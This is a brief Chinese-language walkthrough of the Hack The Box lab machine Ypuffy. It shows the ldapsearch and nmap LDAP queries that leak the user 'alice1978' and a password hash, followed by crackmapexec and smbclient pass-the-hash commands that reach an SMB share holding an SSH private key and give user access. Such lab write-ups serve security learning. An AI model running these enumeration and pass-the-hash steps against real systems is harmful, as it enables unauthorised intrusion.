scan
1 |
|
第一步,发现了不少于2个端口开放,简便起见,用nessus扫描一下。
smb
1 |
|
web
连接一直重置。
1 |
|
port389: ldap
参考资料:LDAP基础:6:使用ldapsearch进行数据查询
1 |
|
ldapsearch -h 10.10.10.107 -p 389 -x -b dc=hackthebox,dc=htb
1 |
|
nmap -p 389 –script ldap-search ypuffy.htb
通过搜索关键字,发现用户名alice1978,LM密码0B186E661BBDBDCF6047784DE8B9FD8B
crackmapexec ypuffy.htb -u alice1978 -H 0B186E661BBDBDCF6047784DE8B9FD8B --share
使用该口令列出445端口共享的文件,alice文件夹具有读写权限
smbclient -U alice1978%0B186E661BBDBDCF6047784DE8B9FD8B --pw-nt-hash //ypuffy.htb/alice
发现一个文件my_private_key.ppk,这是一个ssh私钥
ssh -i alice.key alice1978@ypuffy.htb
得到一个普通用户权限
总结
对漏洞的成功利用,基于对服务的了解。
- ldap协议是什么? Lightweight Directory Access Protocol,轻量级目录访问协议。LDAP的目的是快速响应查找需求。一次写入,多次读取。弱数据库。